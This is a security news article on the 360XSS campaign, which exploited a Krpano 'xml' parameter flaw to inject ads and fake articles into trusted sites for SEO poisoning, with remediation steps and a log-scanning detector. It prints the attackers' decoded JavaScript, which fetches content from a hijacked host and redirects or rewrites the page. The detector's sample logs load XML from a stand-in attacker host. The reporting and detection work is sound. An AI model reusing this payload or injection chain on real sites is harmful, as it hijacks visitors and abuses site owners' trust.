
Massive XSS Attack Exploits Hundreds of Sites, Including Yale, CNN, and Government Sites, for SEO Poisoning

Securify

A cross-site scripting (XSS) vulnerability has been found to affect hundreds of websites, including those of major institutions such as Yale University, CNN, and various government bodies. The 360XSS attack, as it has come to be known, exploits a vulnerability in the Krpano virtual tour software to serve malicious advertisements and boost the search engine ranking of illicit content. The vulnerability was already publicly known but had not been patched on numerous websites, which allowed attackers to abuse trusted domains for SEO poisoning on a mass scale.

Accidental Discovery Exposes Large-Scale Weakness

The discovery of this large-scale operation began with what seemed like an ordinary web search. Security researcher Oleg Zaytsev stumbled upon a suspicious search result that pointed to a Yale University domain. The title, containing pornography-related keywords, was immediately suspicious. When Zaytsev dug further, he found that the link redirected to a pornographic advertisement.

Curious, Zaytsev investigated the URL, which launched a virtual tour on a subdomain of the Yale Quantum Mechanics Institute. The URL had an “xml” parameter that contained a suspicious-looking URL. When he stripped the parameters, it led him to the real virtual tour of Yale’s Quantum Mechanics Institute, which meant that something was definitely amiss with the URL parameters provided.

Diving Deep Into the Technical Details

Zaytsev’s initial suspicion was a subdomain takeover, a common attack in which a dangling CNAME record left behind by a decommissioned service is claimed by an attacker. Closer examination, however, revealed a more complex issue. The “xml” parameter was being used to import external XML content, which was causing an open redirect. When Zaytsev attempted to redirect to a harmless site, such as example.com, the page errored out, indicating there was more to it than a simple redirect.

The initial “xml” parameter referenced a URL on the official UK Scouts website that had been taken over via an abandoned Azure account. Fetching this URL returned an XML file with an “onloaded” event that called “eval” on a Base64-encoded payload, a strong sign of a malicious XSS payload.

The decoded payload was a script that loaded a target URL from another stolen asset, this time a subdomain of volvo.com, using the “id” parameter to identify the ad campaign.

JavaScript
// Decoded payload as observed by Zaytsev: read the "id" query parameter,
// fetch campaign content from the hijacked volvo.com subdomain and either
// redirect the visitor or overwrite the page with the returned HTML.
const queryParams = new URLSearchParams(window.location.search),
      id = queryParams.get('id');

if (id) {
    fetch('https://bi-portal-bus.volvo.com/auw/video/sax.php?file=' + id)
        .then(response => response.text())
        .then(data => {
            try {
                // A JSON response carrying redirectUrl sends the visitor elsewhere
                let r = JSON.parse(data);
                if (r.redirectUrl) {
                    window.location.href = r.redirectUrl;
                }
            } catch (e) {
                // Anything that is not JSON is treated as raw HTML and replaces the page
                document.open();
                document.write(data);
                document.close();
            }
        })
        .catch(error => {
            console.error('Error fetching data:', error);
        });
} else {
    console.error('No ID parameter found.');
}

Zaytsev realized that this was not the work of a single hacker but a very organized operation with a massive network of hacked assets.

Krpano Framework at the Center of the Weakness

The virtual tour technology was Krpano, which is used for hosting 360° videos and images. Either the website’s implementation or the framework itself was vulnerable. When Zaytsev researched the documentation of Krpano, he discovered that the “xml” parameter, allowing the loading of external XML files, was actually a documented feature.

Further investigation led to CVE-2020-24901, a previously disclosed reflected XSS vulnerability caused by the “passQueryParameter” configuration in Krpano. The setting specifies whether query parameters from the hosting page are passed directly into Krpano’s configuration. Krpano’s default installation had this setting enabled for years, making it easy for attackers to inject arbitrary XML and achieve reflected XSS.

Although Krpano developers attempted to remediate the issue by restricting “passQueryParameter” to an allowlist, adding the “xml” parameter to the allowlist manually still left the vulnerability open. Somewhat surprisingly, Krpano’s official website, which hosted live examples of the framework, was also vulnerable.
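As an added example (not code from the article or from Krpano), the following detection pass lets a site owner check web server access logs for the pattern described above: requests to a tour page whose “xml” parameter pulls XML from an outside host rather than naming a local tour file. The log lines are constructed samples and TRUSTED_HOSTS is an assumed allowlist for your own site.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Added example, not code from the article or from Krpano. Constructed
# access-log lines (Combined Log Format); TRUSTED_HOSTS is an assumed allowlist.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Feb/2025:10:01:02 +0000] "GET /tour/index.html?xml=tour.xml HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Feb/2025:10:01:05 +0000] "GET /tour/index.html?xml=https://evil.example/p.xml&id=42 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Feb/2025:10:01:07 +0000] "GET /tour/index.html?xml=https%253A%252F%252Fevil.example%252Fp.xml HTTP/1.1" 200 5120 "-" "Googlebot/2.1"
198.51.100.2 - - [10/Feb/2025:10:02:00 +0000] "GET /tour/index.html?xml=//evil.example/p.xml HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Feb/2025:10:03:00 +0000] "GET /tour/index.html?xml=https://tours.example.org/t.xml HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""
TRUSTED_HOSTS = {"tours.example.org"}  # assumed: hosts your tours may load XML from

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<path>\S+) [^"]*" (?P<status>\d{3})')


def external_xml_target(request_path):
    """Return the off-site URL in the xml parameter, or None if it names a local file.

    A legitimate tour passes a file name (xml=tour.xml). An absolute or
    scheme-relative URL to a host outside TRUSTED_HOSTS is what pulled
    attacker-controlled XML into the page in the 360XSS campaign.
    """
    query = urlsplit(request_path).query
    for raw in parse_qs(query, keep_blank_values=True).get("xml", []):
        value = unquote(raw)  # parse_qs decoded once; strip a second encoding layer
        host = urlsplit(value).netloc.rsplit("@", 1)[-1].split(":")[0].lower()
        if host and host not in TRUSTED_HOSTS:
            return value
    return None


def scan_log(text):
    """Return one record per request whose xml parameter points off-site."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and (target := external_xml_target(m["path"])) is not None:
            hits.append({"ip": m["ip"], "ts": m["ts"], "status": m["status"], "xml": target})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} -> {hit['xml']}")
```

A Googlebot user agent on a flagged request is worth noting separately, since it is the crawler indexing the injected page that produces the poisoned search results.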

Uncovering the Extent of the Campaign

Having grasped the technical nature of the vulnerability, Zaytsev focused on determining the scope of the attack. Using Google Dorking techniques, he discovered thousands of ads spread across hundreds of infected sites. Government portals, state websites, top universities, major hotel chains, news sites, car dealerships, and Fortune 500 companies were on the list. Most of these sites had millions of monthly visitors and had been targeted multiple times with different types of ads.

The ads weren’t all for pornography. They also hawked diet pills, online casinos, and news hoax sites. A few of the hijacked pages were even being used to boost YouTube video views. It wasn’t a spam operation so much as it was an industrial-scale exploitation of trusted domains.

[Image: impact of the XSS attack]

One example was the official Utah website that had over 100 indexed spam results at the time Zaytsev performed his search. The title, description, and preview image of the injected results were within the attackers’ control, and they used random strings in titles to make each result unique and added fake review counts together with star ratings to lend credibility.

The Motives Behind the Attack

The attackers were taking advantage of the XSS vulnerability largely to redirect users to advertisements. While a direct attack on the vulnerable website and user base would have been more crippling, the attackers likely chose to do this for two reasons. First, they were likely a rogue ad firm more interested in blasting ads than in launching direct cyberattacks. Second, they were operating in a legal gray area, where their actions were unethical but not outright criminal. Stealing user data or launching full-fledged attacks would have attracted law enforcement attention.

But the attackers treated one hijacked site, CNN, differently. Instead of redirecting visitors, the attackers embedded a spoofed article promoting online casinos directly into CNN’s domain. This article, written in Turkish, presented the “Top Reliable Casinos Online.” The attackers were taking advantage of trust by leveraging CNN’s reputation to promote their malicious content.

[Image: XSS SEO poisoning attack]

The XML payload for the CNN exploit was hosted on “jqeury.store,” a domain that served as a hub for multiple instances of the same exploit. Some links also pointed to geo.tv, Pakistan’s largest news site, where similar fake news stories were injected.

Responsible Disclosure Efforts

Zaytsev attempted to report the exploited cases to the affected organizations. Most, he found, did not have a vulnerability disclosure program. Many of his reports went unanswered, lost in unread inboxes or bounced back. Despite this, some reports were successful and earned Zaytsev recognition from organizations such as the U.S. Department of Health & Human Services and CERT-EU.

Zaytsev also reached out to Krpano’s developers, bringing the vulnerable implementation on their own website to their attention and sharing his concern regarding the handling of the XML parameter. Klaus, the lead developer, responded professionally and introduced a fix in version 1.22.4, restricting external resources from being loaded through the XML parameter.

Remediation Steps

In order to remediate the 360XSS vulnerability, website owners are advised to follow these steps:

🔎 Identify all instances of Krpano on your website.

🔄️ Update to the latest version (1.22.4).

✅ Set “passQueryParameter=false” in the Krpano configuration.

🗑️ Delete infected pages and scan for SEO poisoning via Google Search Console.

Acknowledgement

The information in this article is based on research that was conducted and published by Oleg Zaytsev on his blog, https://olegzay.com/360xss/. We acknowledge with gratitude Zaytsev’s work in finding and documenting this widespread vulnerability.

This incident is a reminder of the importance of keeping software patched and security configurations properly set. Even vulnerabilities that have already been disclosed can still be exploited if they are not addressed in time. The scale of the 360XSS campaign shows the impact such vulnerabilities can have and why businesses must prioritize security in their web development process.
